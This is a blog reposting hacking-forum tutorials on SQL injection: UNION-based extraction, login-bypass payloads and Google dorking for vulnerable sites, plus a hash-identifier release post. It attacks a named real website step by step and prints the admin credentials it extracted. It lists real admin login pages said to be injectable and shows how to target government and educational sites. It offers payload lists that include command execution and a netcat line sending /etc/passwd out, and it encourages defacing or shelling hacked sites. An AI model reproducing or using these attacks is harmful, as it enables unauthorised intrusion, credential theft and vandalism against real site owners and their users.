#Chapter3:Super Detailed SQL injection TUTORIAL#



Tutorial by Zer0Freak


Zer0Freak SQLi Tutorials
Difficulty: Basic Level 2 and Intermediate
Requirements: Patience,intuition and understanding
Estimated time to read the chapter: 25-30 min (reading thoroughly will help you understand better)
The method used to extract information from a database in a website using SQL injection queries on the URL/Address bar is what we're gonna learn today.
Previous tutorial: Bypassing Login Pages with SQL injection (Basics and Intermediate)
  • There are many types of SQL injection when it comes to web hacking
  • What we learned in the previous tutorial was the only Basics where were used it to bypass Admin/User logins.
  • However, what will you do if can't bypass it even though it's vulnerable to SQL injection?
  • Well, the answer is simple. You do the process on your URL/Address bar instead of the text boxes on an admin/user login page
Common Types of SQL injection are:
Code:
UNION Based SQL injection
String Based SQL injection
Error Based SQL injection
Double Query SQL injection
Blind SQL injection
MsSQL injection
What we are going to learn today is what we call UNION Based SQL injection
Alright before we start we need to know how a website works while it stores Login information/pages/pictures/etc. in its database
Lets just say that our website will look like this :
"http://www.site.com/index.php?id=5"
Notice at the end of the URL, "id=5"
This is what the query will look like
PHP Code:
SELECT FROM index
WHERE id 
Alright, now you know a bit of how the website works, let's get hacking
Step1: Finding the vulnerability in a website
It'll be like a small puzzle you have to solve. See, you can't just hack a website like http://www.site.com -.-
To hack a website, you need to scan it yourself by clicking links and find out if there's something like "index.php?id=XXX" where "XXX" is a random integer (number) or string (word).
Alright now to find sites vulnerable to SQLi is using Google Dorks.
If you don't know how to use dorks, visit Part 1 of this project to learn all about them
Once you've found a site vulnerable to SQLi, it's time to execute queries.
For this tutorial, we'll be using "http://www.leadacidbatteryinfo.org" as an example.

Try browsing the website and see if you can find links like "index.php?id=xxx"
It can be anything like "details.php?id=xxx" or "gallery.php?id="
Just find an address with a number at the end of the URL
Here's what I found "http://www.leadacidbatteryinfo.org/newsdetail.php?id=51"

Now to test for vulnerabilities is by ADDING a quote " ' " at the end of the url i.e after the integer or string
So it'll look like this,
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51'

Now you'll notice an error saying
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Spoiler (Click to View)
This shows that the website is vulnerable to SQL injection.
How is this possible?
Look at the query when we added a quote " ' "
PHP Code:
SELECT FROM article
WHERE id 
Notice that, their database never stored "id = 5 ' "
This is why they return an error result
Now that we know the website is vulnerable to SQL injection, let's advance to the next process
Step2: Finding the number of columns a website has

This is the part where most people had commonly misunderstood.
To get to the point, what we're about to do is find how many columns the website has using NoError/Error statements.
Alright lets get started.
The query we'll be using is "order by X--" where "X" is a random integer (number)
Start by entering "order by 25--"
Enter it at the end of the URL, so it'll look like this
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 25--
Error, there are no 25 columns, so it'll be less than 25

Now lets try "order by 20--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 20--
Still Error, so there are less than 20 columns

How about we go down a bit to "order by 5--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 5--
aha! No errors. So let's see if there are more than 5 columns

Now lets go up to "order by 11--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 11--
Hmm, no errors I see. So it's obvious that there could be more than 11 columns

See if we can increase to "order by 12--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 12--
Error! So this means the last number that returned no error is 11
Therefore, the website has 11 columns

Tips:
An error while scanning for number of columns will look like this
Spoiler (Click to View)
While No errors will show the page as normal
Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement
First off, we need to know what does "UNION SELECT" means
Lets say we have 2 tables, "users" and "admin"
Basically, UNION SELECT is a statement where all these information will be collected as one.
Look at this query
PHP Code:
SELECT FROM users
UNION SELECT FROM admin 
If we perform the UNION SELECT statement, we can get both users and admin information from their database
The point is that, UNION SELECT returns our results with the information we need
If you want to find vulnerable columns, use UNION SELECT
If you want to find version of database, UNION SELECT
If you want admin information! use UNION SELECT
Alright, now that we know something about the Union function, lets continue.

Take our website that has 11 columns and add a "UNION SELECT" statement.
Here's how our query will look like
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--
This is what you would normally do if you use UNION function while SQL injecting a website

Focus on something like this, "index.php?id=-X UNION SELECT N--"
Where "X" is a random integer/string and "N" is the number of columns followed by two hyphens " -- " and another hyphen " - " beside "X"
Step4: Random numbers appear on screen, the next step
Alright I'm pretty sure you'll find a bunch of numbers showing up on the screen.
These are known as "vulnerable columns" which states that those vulnerable columns have stored data inside them we need to extract.
Here's how it'll look like:
Spoiler (Click to View)
You need to inject the number at the very top (always at the very top)
So, in this case we have number "8"
Now you might be asking, what can I do with a vulnerable column?
Well here's what you can get-- INFORMATION!
You need a lot of information to study from the website, here are a couple of examples.

Replace the vulnerable column i.e number 8 with a statement
Statements:
Code:
@@version, version()
database(),
user(),
@@hostname
@@datadir
Their functions
@@version/version() = find the version of the database
database() = find the current database
user() = find the user information
@@hostname = Current hosting info
@@datadir = directory of the data of the website

To find the version of the database in the website, replace the vulnerable column i.e number 8 with "@@version" or "version()
It'll look like this
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--
Results:
Code:
5.1.52-log
So the database version is 5, which is good because it'll be easier to SQL inject the website.
Note:
Database version less than 5 "<5" = you need to guess tables (a bit hard work)
Database version greater than 5 ">5" = easy to inject with another function i.e group_concat

If you ever want to SQLi a website with version <5, then you can guess the tables with the following below
Code:
user
username
usernames
admin
admins
users
manager
account
accounts
member
login
logins
members
tbl_user
tbl_users
tbl_admin
tbl_admins
tbl_member
tbl_members
tbladmins
memberlist
tbluser
tblusers
tblmanager
tblmanagers
tblclients
tblservers
adminuser
usertbl
userstbl
admintbl
adminstbl
id
tuser
tusers
uid
userid
user_id
auid
adminpass
LoginID
FirstName
LastName
cms_user
cms_member
cms_users
cms_members
cms_admin
cms_admins
user_admin
user_info
user_list
user_login
user_logins
user_names
userrights
userinfo
userlist
webadmin
webadmins
Webmaster
Webuser
product
products
tblproducts
tblproduct
tbl_tbadmin
Adminlogin
We'll be knowing how to get the tables in the next step.
But for now, let's see what we can get with other statements
Lets try all statements at once shall we
The URL will look like this,
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(database(),version(),@@datadir,@@hostname,user()),9,1 ​0,11--
Results:
Code:
32908_leadacidbatteryinfoorg5.1.52-log/mnt/cluster/data/mysql1.myregisteredsite.com32908_user116602@lnh-www1h.bluehalo.myregisteredsite.com
3
We have almost every information we have about the website
Look close here, we used a command "group_concat"
Here's its function:
Group_concat = Gets every information at once i.e grouping them with the help of statements. Ex. group_concat(database())
Note:Group_concat won't work with versions less than 5
Step5:Getting the table names
What are tables?
Tables contain columns and columns contain the data
It's like a stack (table) of books (columns) and data inside the books (data inside the columns)
Alright, first lets look up some functions we're gonna use to extract table names (Important)
Code:
group_concat = grouping up data to a specific statement
table_name = tables names to be shown on screen
from = location of a specified statement
information_schema.tables = information in the database with table names in it
table_schema = tables in a database
database() = current database in the website
0x0a = a Hex code that creates a new line for organizing tables in an order
Now lets combine those functions and make up a query that will give us the table names
So, here's what our link will look like:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11 from information_schema.tables where table_schema=database()--
In here, we replaced our vulnerable column with "group_concat(table_name,0x0a)"
and then we added a
"from information_schema.tables where table_schema=database()--"
after the last column (excluding the two hyphens after 11)
Results on table names:
Code:
pdigclicks ,pdigengine ,pdigexcludes ,pdigincludes ,pdigkeywords ,pdiglogs ,pdigsite_page ,pdigsites ,pdigspider ,pdigtempspider ,tbladmin ,tblbanner ,tblbanner_page ,tblfaq ,tblncategory ,tblnews
Spoiler (Click to Hide)
[Image: e9syW.png]
Alright now that we've found the tables, what you're gonna have to do is
that, you have to find tables where user/admin information are stored
In this case, "tbladmin" seems to be having an admin information stored in it.
It's all about predicting and expecting what's behind every table you see
Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
Replace and Add the following
Vulnerable Column = replace with "group_concat(table_name,0x0a)"
After the last column = Add "from information_schema.tables where table_schema=database()--"
Also, don't forget about UNION SELECT before the column numbers and the hyphen ( - ) before "X" at index.php?id=X where "X" is a random integer/string
Step6:Getting Columns from Tables
Alright obviously, our next task is to get the column names from a specific table which in our case was "tbladmin'
To do this, we're gonna have to alter some queries a bit
Now look closely at this syntax:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--
Here's what we replaced:
table_name = replaced by "column_name"
information_schema.tables = replaced by "information_schema.columns"
table_schema = replaced by "table_name"
database() = replaced by "0x74626c61646d696e--"
Now that you know the replacements in our syntax, you still might be wondering what's up with the last part where entered "0x74626c61646d696e--"
First of all, these are known as Hex
To make a Hex readable, we put "0x" at the beginning
I'll explain this briefly. So our table name was "tbladmin"
To enter that table using the syntax above, we have to convert that table name to Hex
In order to do that, visit this website:
http://www.swingnote.com/tools/texttohex.php
It's a text to hex converter
Enter "tbladmin" in the text box and hit convert
You'll notice the results will be "74626c61646d696e" (that's the hex)
Now to make it readable to the website, add "0x" at the beginning
So it will be:
Code:
0x74626c61646d696e

Now you know how Hex works, lets look up some functions we replaced and know their uses (Important)
Code:
group_concat(column_name,0x0a) = grouping the column names we're going to extract
information_schema.columns = column names stored in database
table_name = extracting column from a specific table
0xHEX_Code_Table = Specific table name converted to hex
Results after extracting column names from tables:
Code:
adminid ,username ,password ,dom
Spoiler (Click to Hide)
[Image: yHNL1.png]
Now that we've got the columns from that table, it's time to extract the information.
What we're gonna need here is obviously only the "username" and "password"
Step7:Getting Data from Columns
Alright, lets extract the information
Look closely at the syntax:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x0a),9,10,11 from tbladmin--
Keep this formula-like syntax in your mind whenever you want to extract data from columns
Code:
http://www.site.com/index.php?id=-X UNION SELECT N,group_concat("columnName,0x3a,columnName,0x0a) from "tablename"--
Where "X" is a random integer/string followed by a hyphen ( - ) while "N" is the number/position of the column and "columnName" is the column you want to extract data while "tablename" is where you extract data from a specific table then two hyphens in the end ( -- )
CONTINUED BELOW
Now for revising,
column names = username, password
separator = 0x3a (a hex for a colon " : ")
table name = tbladmin
Once you execute that syntax, you get the username and password separated by a colon
Results after executing the syntax:
Code:
ishir:ishir123
Username: ishir
Password: ishir123
Special cases: Hashed Usernames and Passwords
Most websites will have their passwords hashed as MD5
In this case you'll need to crack them.
Using some websites will help you
Here's a list of Hash cracking websites:
Code:
www.md5decrypter.co.uk/
www.md5this.com/
www.md5crack.com/
http://hashchecker.de/find.html
An MD5 Hash will look like this:
Code:
21232f297a57a5a743894a0e4a801fc3 -- 32 characters
A SHA-1 Hash will look like this:
Code:
d033e22ae348aeb5660fc2140aec35850c4da997 -- 40 characters
I'll make up a detailed tutorial on Hash cracking soon.
But for now, refer to this for a little knowledge about hashes
http://www.hackforums.net/showthread.php?tid=1393830
Credits to Haxor and Insidepro

Last Step: Finding the admin page and logging in for the goods
Alright, now that we have our admin login info
Username: ishir
Password: ishir123
It's time to find the login pages
To do this, you can use Admin Page Finders
Here's some you can use
>>Scorpion Admin Page Finder<<
http://sc0rpion.ir/af/
>>Outlaw Admin Page Finder<<
http://www.tools.th3-0utl4ws.com/admin-finder/
>>Napsterakos Admin Page Finder<<
http://www.hackforums.net/showthread.php...ight=HaviJ
>>HaviJ Injector/Cracker and Admin page finder<<
http://www.hackforums.net/showthread.php...age+finder
Alright after scanning the website for admin pages, you should see something like this:
Code:
http://www.leadacidbatteryinfo.org/admin/
Now all you have to do is enter the admin details you extracted from their databases and login as an admin!
However, some websites could be already hacked and messed up
Which in our case, this website was already messed up in such a way you can't login as an admin anymore.
These are just the basics of SQL injection.
There are lots of websites to hack and more to practice with.
Just so that you'll get a clear view of this tutorial, look up a demonstration video on how I inject a site with UNION Based/Normal SQL injection:



Extras:
Acunetix Web Vulnerability Scanner:
Features: Scans a specific website of your choice for vulnerabilities and directories too
Download it by clicking here

SQL Poizon:
Scans for dorks, crawls a lot of websites at a time, organized work space for SQL injection, and a built-in browser
http://www.hackforums.net/showthread.php...SQL+poizon

SQL injection vulnerable lists:
Lists by iTz Ryannn x
http://pastebin.com/y2jD5Fgz

Lists made by Dyme
http://pastebin.com/kVMYX0Eh
Thanks for reading this tutorial and I hope you enjoyed and learn a lot from it
End of Chapter 3
Upcoming chapter: Error Based SQL injection Detailed
Need any help: zerofreak@live.com
Please stay tuned to MegaProjectSQLi by Zer0freak for more tutorials.
Have a great day
Posted by ZentrixPlus at 12:37 PM 42 comments

 

#Chapter2: Basic SQL injection with Login Queries#


Tutorial 100% Made by Zer0Freak

Bypassing Login pages on websites using SQL injectable queries


Level: Beginners and Intermediate
Requirements: Patience and stradegy
Alright in this tutorial, we'll be learning how to bypass login pages with the help of MySequel injection using Login Queries.
This is Chapter 2 of the MegaProject.
Please visit Chapter 1 if you haven't seen it yet
Also, if you need some questions answered, you can find solutions on my FAQ Thread: http://www.hackforums.net/showthread.php?tid=1993481
What is SQL injection?
Answer: Basically, it's a process where you execute a certain query in a website in order to extract information such as log-in information, users etc. for either personal gain or random use from the website's database.
There are many type of certain queries that can be executed in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is Basic SQL injection query where it can be executed in a login page.
Example:
Code:
Username: admin
Password: ‘ or ‘1’=’1
When you enter the password "‘or ‘1’=’1" in most website, there's a chance you can gain access.
How does it happen? Look at the code when we execute that query
PHP Code:
SELECT FROM users
WHERE username ‘admin’AND password ‘ ‘ or ‘1’=’1’ 
In the password field, we inserted a quote ' first, then a bunch of random characters like "1".
The database always scans for rows and hence in the query we have executed, there's only 1 row which states that there's no reason for the login to be incorrect.
However, some websites can filter out these type of queries, so it's best to use different ones too. You can find some below
Now that you have an idea of how Basic SQL injection queries work, lets try and put it to use shall we
Step1: Finding websites with Login Pages
Alright, out basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass it.
For this, we can use dorks.
If you don't know how to use dorks or have no idea about it, please visit my previous tutorial: http://www.hackforums.net/showthread.php?tid=2059771
In this tutorial, we can use these dorks:
Code:
inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html
If you want to find more dorks when using this method, you can find them here:
Code:
http://pastebin.com/ZjxpivV3
Step2: Now Executing the query
Alright, now that you've found your target with a log in page, lets play with it a bit.
So here's what you're gonna do
Username will be admin, cause most sites are having admin data stored in their databases
Code:
Username: admin
Password: ' or 0=0 --
Didn't work? No worries, there's more to that than just a single query
Here's a list of queried passwords you can use to hopefully inject the site.
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Credits to RealSteal for some of the codes mentioned above.
Note: Sometimes, this is not the best way of hacking websites with SQL injection but I guarantee, you'll be a successful patient SQL injector and get used to this method.
Step3: I LOGGED in, what to do now?!
Well, first off, if you did login, then congratz on your first successful attempt of SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it
Others will just shell it and have other uses such as rooting, webhosting etc.
If would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon Now you might wanna watch the video so that you'll get the idea of how I login as an Administrator on a SQLi vulnerable website



Extras:
Common Password Queries:
Code:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

If version of Database is greater than 5, then queries with UNION,group, @@version,orderby,benchmark etc can be executed
Code:
1234' AND 1=0 UNION ALL SELECT 'admin'
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
@@version
select @@version
select @@servername
select @@microsoftversion
select * from master..sysservers
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
SELECT 1 -- comment
SELECT /*comment*/1
ORDER BY 1--
' union all select sum(columntofind) from users--
UNION ALL SELECT null
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
SELECT TOP n columns
select * from OPENROWSET('MSDASQL'
select * from OPENROWSET('SQLOLEDB'
masters..sysxlogins
sys.sql_logins
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT CHAR(0x66)
SELECT * FROM members
@@version
SELECT USER();
select host
SELECT 1;
SELECT /*comment*/1;
ORDER BY 1--
UNION ALL SELECT null
SELECT schema_name FROM information_schema.schemata;
SELECT table_schema
SELECT grantee
limit 1
SELECT host
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100
select benchmark( 500
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT ascii('A')
SELECT CONCAT('0x'
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT /*!32302 1/0
SELECT 0x5045
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
SELECT IF(1=1
' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a
union SELECT LOAD_FILE(0x2f6574632f706173737764)
load data infile 'c:/boot.ini' into table foo;
# SELECT ... INTO DUMPFILE
SELECT login || '-' || password FROM members
select versionnumber
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select * from syscat.tabauth;
select current server from sysibm.sysdummy1;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tdbauth where grantee = current user;
select name from sysibm.systables;
select name
SELECT schemaname FROM syscat.schemata;
SELECT foo FROM bar fetch first 1 rows only;
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1;
SELECT cast(’123' as integer) FROM sysibm.sysdummy1;
select version();
select current_database();
"select current_user;
select session_user;
"SELECT current_setting('data_directory');
select current_setting(’log_connections’);
select current_setting(’log_statement’);
"select current_setting(’port’);
select current_setting(’password_encryption’);
select current_setting(’krb_server_keyfile’);
"select current_setting(’virtual_host’);
select current_setting(’port’);
"select current_setting(’config_file’);
"select current_setting(’hba_file’);
"select current_setting(’data_directory’);
LIMIT n
SELECT pg_sleep(10);
SELECT current_database()
SELECT relname
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'
SELECT DISTINCT relname FROM pg_class C
SELECT 1; --comment
SELECT /*comment*/1;
SELECT chr(65);
SELECT ascii('A');
SELECT CHR(65)||CHR(66);
SELECT usename
SELECT usename FROM pg_user WHERE usesuper IS TRUE
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');
SELECT 'A' || 'B';
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);
SELECT * FROM dblink('host=put.your.hostname.here user=someuser  dbname=somedb'
select dbmsinfo(’_version’);
select dbmsinfo(’session_user’);
select dbmsinfo(’system_user’);
select dbmsinfo(’database’);
select dbmsinfo(’db_admin’);
select dbmsinfo(’create_table’);
select dbmsinfo(’create_procedure’);
select dbmsinfo(’security_priv’);
select dbmsinfo(’select_syscat’);
select dbmsinfo(’db_privileges’);
select dbmsinfo(’current_priv_mask’);
select top 10 blah from table;
select first 10 blah form table;
select table_name
select relid
select relid
select column_name
select 1 union select 2;
select cast(’123' as integer);
select @@version"
select name from master..syslogins"
select name from master..sysdatabases"
convert(integer
waitfor delay '0:0:5'

Database Version lower than 5 i.e Version 4 cannot accept UNION version 5 type queries.
Looking for a test or challenge?
Try Stewie's hack test: http://www.stewie390.info/hack_tests/lvl5/homepage.php
Here are some sites you can test on:
Code:
http://www.amskrupajal.org/AdminLogin.asp
http://www.csimatrichss.org/adminpage.asp
http://www.preventivecardiology.in/adminlogin.asp
http://pndllc.com/pndllc/admin/adminlogin.asp
http://www.singleusemedical.com/admin/adminLogin.asp
http://www.ringjordan.com/admin.asp
http://sunmarytrust.org/adminlogin.asp
I tried injecting all of them and it worked, so it should work for you too
Good luck

End of Chapter 2
Upcoming Chapter 3:
Union Based/Normal SQL injection
Posted by ZentrixPlus at 1:50 AM 118 comments

 

Creating/Using Dorks in SQL injection


Tutorial by Zer0Freak
For Beginners
A method of finding websites vulnerable to SQL injection is using what we call "dorks"
Dorks:They are like search criteria in which a search engine returns results related to your dork.
The process can be a little time consuming, but the outcome will be worth it after learning on how to use dorks

For this tutorial, the search engine we'll be using is Google
Credits to those who are mentioned in this tutorial
Now I'll show you how to use dorks with the help of a video too.
Step1: Finding your dorks i.e. the criteria you'll be using
Dork List compiled by kobez-
Code:
http://pastebin.com/0FqmasC7

Dork List by Sidesipe-
Code:
http://pastebin.com/x1rtqktj

Dork List by .Newsletter'
Code:
http://pastebin.com/APxqavu9

For this tutorial, we'll be using this dork "inurl:index.php?id="
Step2: Making use of your Dorks with the help of Google

Here's what you do:
  • Go to http://www.google.com
  • Type the dork in the search bar "inurl:index.php?id=" (with or without quotes)
  • Now you'll find a whole lot of links in your results

Here's how you can speed up your process:
In your mouse, there should be a scroll button right?
Hover your mouse on each link and hit the scroll button so that it'll open on a new tab. (Lets say you can open about 10 links at a time)
Step3: Vulnerability approach

Now to see whether the website is vulnerable to SQL injection or not, we simply put in a quote " ' " at the end of the url address.
So our site will look like this
Code:
http://www.site.com/index.php?id=123'

Do the same thing with the websites you opened on your tabs and see if there's any vulnerable website.

To determine if a website is vulnerable or not, it should return an error!

Note: If you can't find any vulnerability after doing some vulnerability search on this dork, you can always browse the dork list I've mentioned above and use any of them until you find any website vulnerable to SQL injection

Here's a video demonstration on how to use Dorks:



Extra Notes: Hunting for specific websites with specific domains
Ever want to hack a government website, or an organization website?
It's simple. All you have to do is improvise your dorks.
First off, here are some common domains
.gov = Government websites
.edu = Educational websites
.org = Organizational websites
.com = Commercial websites
.info = Informative websites
.net = Networking websites ( similar to .com)

Alright now you know some specific domains, lets add them to our dork shall we?
Follow this formula-like dork
Code:
"inurl:."domain"/"dorks" "
So you would normally understand it like this:
"inurl" = input URL
"domain" = your desired domain ex. .gov
"dorks" = your dork of your choice
Now for an example, lets say you want to hack government websites
Here's how it'll look
"inurl:.gov/index.php?id="
Once you search that up, you'll find a lot of government websites on your results

Changing "inurl" and using another one
Yes, you can change that too.
Google has a lot of functions you can come up with
Some of them are below where you can change "inurl" and make another dork
Code:
intitle:
intext:
define:
site:
info:
link:
Credits to Real Steel for bringing this up
Choose any of the and make another.
Example: "intext:.edu/gallery?id="
More information about those here: http://www.hackforums.net/showthread.php?tid=2033496


 
Some Dork Scanners you can use to help you speed up the process

Scanner by moveax
http://www.hackforums.net/showthread.php?tid=1985016

Scanner by p0iz0ner
http://www.hackforums.net/showthread.php...SQL+poizon

Scanner by kript0x
http://www.hackforums.net/showthread.php...rk+scanner

If you're lazy in using dorks to find vulnerable websites, then you can use some list right here:

Vulnerable List by Dyme:
http://pastebin.com/kVMYX0Eh

End of Chapter 1
Upcoming chapters:
Chapter2- Basic MySQL injection using "Login" Queries"
Please stayed tuned with my tutorials and hope you enjoyed this chapter
Zer0Freak
Posted by ZentrixPlus at 1:14 AM 131 comments

 

Zer0Freak's Hash Identifier/Detector Has been Released version 1.0.0.1

Details:
Programmed in VB.Net
Will be done on C# and C++ soon
Version: 1.0.0.1
Copyright © ZeroFreak 2012
Hashes it can Detect:
MD5
SHA-1
SHA-256
SHA-384
SHA-512
MySQL
MySQL 5
DES(Oracle)
DES(Unix)
MD5(Unix)
MD5(APR)
MD5(phpBB3)
MD5(Wordpress)
SHA-256(Unix)
SHA-512(Unix)
MD5(Base-64)
SHA-1(Base-64)
SHA-224(Base-64)
SHA-512(Base-64)
SHA-256(Base-64)

More known hashes coming soon
Next version features:

More hashes will be added specially hashes with Salts
Tips on cracking those hashes too
Hash cracking tips and websites etc.

Preview of the Identifier:




 Very friendly GUI and Easy to use
Download it here: http://adf.ly/4mfy1

Source code will be released soon
zerofreak@live.com
Posted by ZentrixPlus at 11:16 AM 13 comments

 
Subscribe to: Posts (Atom)